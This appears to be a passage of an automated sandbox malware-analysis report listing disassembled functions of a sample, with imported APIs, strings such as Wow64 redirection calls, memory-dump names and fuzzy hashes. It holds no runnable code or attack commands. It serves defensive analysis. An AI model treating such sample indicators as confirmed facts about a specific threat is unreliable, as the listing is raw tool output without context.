GetModuleHandleA.KERNEL32 ref: 00401559
GetProcAddress.KERNEL32 ref: 0040156E

Strings

_Jv_RegisterClasses, xrefs: 00401564
libgcj-16.dll, xrefs: 00401552

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-16.dll
API String ID: 1646373207-328863460
Opcode ID: 8ba482886190431bc9988d14ea31dc33522dded13f7e9a50d9d0ed5aa552564c
Instruction ID: 2fdc110a156f551c8cd786261540a5f6ac8087ba26b816c6412bfc65294ee084
Opcode Fuzzy Hash: 8ba482886190431bc9988d14ea31dc33522dded13f7e9a50d9d0ed5aa552564c
Instruction Fuzzy Hash: 5FF0D0A0B52A05A4FE199B61EC857702250AB84754FCC04379A0F593F0EF3CD696C71D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BE1C
fprintf.MSVCRT ref: 0040BE45

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040BE3E
Argument singularity (SIGN), xrefs: 0040BE64

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 620453056-2468659920
Opcode ID: 43eed7583625b49f6085df9f5cb9a1dc047313d47cffcdb977431ea2891b9163
Instruction ID: 19ce3f33db7a2658bfdcd83e56105f1b7ae21502c3cf16d6ac7e68aa8ec534b6
Opcode Fuzzy Hash: 43eed7583625b49f6085df9f5cb9a1dc047313d47cffcdb977431ea2891b9163
Instruction Fuzzy Hash: 29F01263514E8881C211DF1CE8002DBB370FF9E759F595316EB893A424DB25C687C744

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BE1C
fprintf.MSVCRT ref: 0040BE45

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040BE3E
Overflow range error (OVERFLOW), xrefs: 0040BE70

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 620453056-4064033741
Opcode ID: 1cf90ac86213dd1da95a63069c7d403dbda67feaa460a859c5656fcc0440b681
Instruction ID: b3050e1c08278f3c8decda70f72fa2fbd3e5ca3000688db1e8063bec655da125
Opcode Fuzzy Hash: 1cf90ac86213dd1da95a63069c7d403dbda67feaa460a859c5656fcc0440b681
Instruction Fuzzy Hash: 75F03663514E8881C211DF1CE8002DBB370FF9E759F595316EB893A464DF25C687C744

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BE1C
fprintf.MSVCRT ref: 0040BE45

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 0040BE80
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040BE3E

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 620453056-2187435201
Opcode ID: f0ebca28b75fc7539fbb5ea2b2d8d8cca5d610c68f29c4043a8bcbc81d59dfd2
Instruction ID: 2ad7bcda0dac9121d5e8ef828450ad48bf36e418cae787cb9faa5c90f7a24f7f
Opcode Fuzzy Hash: f0ebca28b75fc7539fbb5ea2b2d8d8cca5d610c68f29c4043a8bcbc81d59dfd2
Instruction Fuzzy Hash: 69F03663514E8882C211DF1CE8002DBB370FF9E759F595316EB893A464DF25CA87C744

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BE1C
fprintf.MSVCRT ref: 0040BE45

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040BE3E
Total loss of significance (TLOSS), xrefs: 0040BE90

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 620453056-4273532761
Opcode ID: 8d35d87a92ad3bffeb1cd43fc8fdbe1de7821a82b499622c7892d1f8b63a3360
Instruction ID: 0f35f3ce4099d81356c2684f552d221e44a07214b01c8198cfd4ab5f422a7ee8
Opcode Fuzzy Hash: 8d35d87a92ad3bffeb1cd43fc8fdbe1de7821a82b499622c7892d1f8b63a3360
Instruction Fuzzy Hash: 05F03663514E8881C211DF1CE8002DBB370FF9E759F595316EB893A424DF25C687C744

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BE1C
fprintf.MSVCRT ref: 0040BE45

Strings

Partial loss of significance (PLOSS), xrefs: 0040BEA0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040BE3E

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 620453056-4283191376
Opcode ID: 817084f93ee30ffaa26630ccd3604f2c6a5995f95bdbd74421cf26b918955273
Instruction ID: 345b85c61e7c7fb1f545bc56dd58218434e1a3a0144d3530c80621300a1addd5
Opcode Fuzzy Hash: 817084f93ee30ffaa26630ccd3604f2c6a5995f95bdbd74421cf26b918955273
Instruction Fuzzy Hash: 69F03663554E8885C211DF1CE8002DBB370FF9E759F595316EB893A464DF25C687C744

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BE1C
fprintf.MSVCRT ref: 0040BE45

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040BE3E
Argument domain error (DOMAIN), xrefs: 0040BE01

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_funcfprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 620453056-2713391170
Opcode ID: 8751ee182456a85a9ea3c5762ded0571226fc54b35736c0c8eca1975fd212cb5
Instruction ID: 732325cf8245d087d2908edae5bd42b628333ddb6a97d386ad8f4fe362403dc2
Opcode Fuzzy Hash: 8751ee182456a85a9ea3c5762ded0571226fc54b35736c0c8eca1975fd212cb5
Instruction Fuzzy Hash: 97F01D63914E8882C212DF18E8002DBB370FF9EB99F595306EB883A524DB25C683C704

Uniqueness

Uniqueness Score: -1.00%

Function 03A6FF70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03A6FF85
GetProcAddress.KERNEL32 ref: 03A6FF95

Strings

kernel32, xrefs: 03A6FF7E
IsWow64Process, xrefs: 03A6FF8B

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
Instruction ID: 3a071bd5c86583be72fee183a642e77d40071313b6bfe73d22bf5a2c2ac63f40
Opcode Fuzzy Hash: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
Instruction Fuzzy Hash: 17E04F62721B0186EE46CB55F894365A368EB9B7D1F482016E98B46364EF3CC288CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00418500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0041850E
GetProcAddress.KERNEL32 ref: 0041851E

Strings

msvcrt.dll, xrefs: 00418507
_set_output_format, xrefs: 00418514

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _set_output_format$msvcrt.dll
API String ID: 1646373207-3508247455
Opcode ID: ac8738389bdfaf344c158ae001e2be508767f256e04e6081fe4a04cfdbd57e42
Instruction ID: cd4bf6834696157f3884db9870dacf5d7c4b768a3e50cd7f2cb8bf850e8b41d6
Opcode Fuzzy Hash: ac8738389bdfaf344c158ae001e2be508767f256e04e6081fe4a04cfdbd57e42
Instruction Fuzzy Hash: 1CE0ECA0741B0B91EF59EB98B9D435433A1A759784F40502DCA1E47370EE7C959EC319

Uniqueness

Uniqueness Score: -1.00%

Function 0041B35D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D640: RtlCaptureContext.KERNEL32 ref: 0040D6C1
Part of subcall function 0040D640: RtlUnwindEx.KERNEL32 ref: 0040D6DF
Part of subcall function 0040D640: abort.MSVCRT ref: 0040D6E5

abort.MSVCRT ref: 0041B335
__iob_func.MSVCRT ref: 0041B33A
fwrite.MSVCRT ref: 0041B356

Strings

terminate called without an active exception, xrefs: 0041B34F

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: abort$CaptureContextUnwind__iob_funcfwrite
String ID: terminate called without an active exception
API String ID: 907361408-2468313033
Opcode ID: 062c25a0150f002571873c25754115128e09fffa15c348c951087dfd2b870602
Instruction ID: bc22aceaa1023e4020bd4d83504e2e0e22bc6169bbce650405617a3d95b5b83e
Opcode Fuzzy Hash: 062c25a0150f002571873c25754115128e09fffa15c348c951087dfd2b870602
Instruction Fuzzy Hash: 37D05E7034520D95EA10BBA394167DD1610EB92B4CF48002FBE16176A2CE3EC486834F

Uniqueness

Uniqueness Score: -1.00%

Function 03A713A4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03A713B4
GetProcAddress.KERNEL32 ref: 03A713C4

Strings

kernel32, xrefs: 03A713AD
Wow64DisableWow64FsRedirection, xrefs: 03A713BA

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
Instruction ID: 476af95b668d5c34baabf2726d9b9162136d98bf2bae173b9f9205d1dd2f2f7d
Opcode Fuzzy Hash: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
Instruction Fuzzy Hash: A3D0A710711B0581FE46DB92FC843A81354AB9FBD0F4C1027889E16320EE3CC3C9C741

Uniqueness

Uniqueness Score: -1.00%

Function 03A713DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03A713EC
GetProcAddress.KERNEL32 ref: 03A713FC

Strings

kernel32, xrefs: 03A713E5
Wow64RevertWow64FsRedirection, xrefs: 03A713F2

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
Instruction ID: 5c91c8feeab22b6ef9aa2fbadd1adc40bb0900129c0cccbd05ca058ebd1c387a
Opcode Fuzzy Hash: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
Instruction Fuzzy Hash: F4D0A750721705C1EE16DB92FC843A42364ABAFBC1F4C1067C85E16320EE2CC389C741

Uniqueness

Uniqueness Score: -1.00%

Function 00418554 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0041855B
GetProcAddress.KERNEL32 ref: 0041856B

Strings

_get_output_format, xrefs: 00418561
msvcrt.dll, xrefs: 00418554

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _get_output_format$msvcrt.dll
API String ID: 1646373207-3432234555
Opcode ID: 880ebb1eafc9ed4b9c4f54d776aaa8c604b7c511c29b1546459590cb4a66cddf
Instruction ID: 167159603bc6f04bc5539291fbcfe74edf548e38f1cccc449200ed51e832b705
Opcode Fuzzy Hash: 880ebb1eafc9ed4b9c4f54d776aaa8c604b7c511c29b1546459590cb4a66cddf
Instruction Fuzzy Hash: BCD067A0741B0691EE54AB44EA8434433A2BB06788F80551A861E43334EF7C915AC31A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7B0 Relevance: 6.3, APIs: 5, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040B852
memcpy.MSVCRT ref: 0040B867
free.MSVCRT ref: 0040B872
free.MSVCRT ref: 0040B897

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: free$memcpystrlen
String ID:
API String ID: 4283329877-0
Opcode ID: 34399065b77c793ae05ad23654843d20e3c04f5babb0865d188057ac97357dc4
Instruction ID: 388efaf93bfddd7bc985960f36ac3d6e1d54754bad6cbad14641479d00d8d790
Opcode Fuzzy Hash: 34399065b77c793ae05ad23654843d20e3c04f5babb0865d188057ac97357dc4
Instruction Fuzzy Hash: BC21A77331564485EE256F16950036A7264E784BD8F1C8237EE5927BD4DB3CC842878D

Uniqueness

Uniqueness Score: -1.00%

Function 0367C3B7 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0367C3DA

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

malloc.LIBCMT ref: 0367C3E8

Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C6A3
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C6A8

malloc.LIBCMT ref: 0367C40A
_snprintf.LIBCMT ref: 0367C425

Part of subcall function 0367C9C3: _errno.LIBCMT ref: 0367C9FA
Part of subcall function 0367C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0367CA05

malloc.LIBCMT ref: 0367C440

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction ID: 3a68859503ecd566983a64de25d4a066591548321de59b5d07aa77f582269f94
Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction Fuzzy Hash: 6A116A30A2CF084FD7A8EB6CA48566976D1FB8C310F50465EE08AC3395EA389C8187C6

Uniqueness

Uniqueness Score: -1.00%

Function 0040B270 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 310stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040B2F3
strlen.MSVCRT ref: 0040B3CE
strlen.MSVCRT ref: 0040B412

Strings

_GLOBAL_, xrefs: 0040B2A2

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: c8e3dc66bbba97f154ca653e5303b70cb98d5d19ba8968e8b7955a3240e0f749
Instruction ID: b115a5b3a407276d1a3bc6af74bbac10de785636d398501bd7a5a7807731801e
Opcode Fuzzy Hash: c8e3dc66bbba97f154ca653e5303b70cb98d5d19ba8968e8b7955a3240e0f749
Instruction Fuzzy Hash: 5AD1BD72610BD48DE720CF75D8583EE3BA5F74578CF54402ADA882BB89DB3D8646C788

Uniqueness

Uniqueness Score: -1.00%

Function 0367D9B3 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0367D9EB

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

_invalid_parameter_noinfo.LIBCMT ref: 0367D9F6
_flush.LIBCMT ref: 0367DAA8
_fileno.LIBCMT ref: 0367DAC9

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction ID: c1c3049a6aa0076bedc6720b22977744141153530098b8023462ad08e2713667
Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction Fuzzy Hash: 9D41483021CF0D4BC72CEE6D954923576D1FF58210B980B6ED48AC32A6EAE0D85386C6

Uniqueness

Uniqueness Score: -1.00%

Function 004065B4 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

}, xrefs: 00407FA9
{parm#, xrefs: 004065B8
this, xrefs: 00408195

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
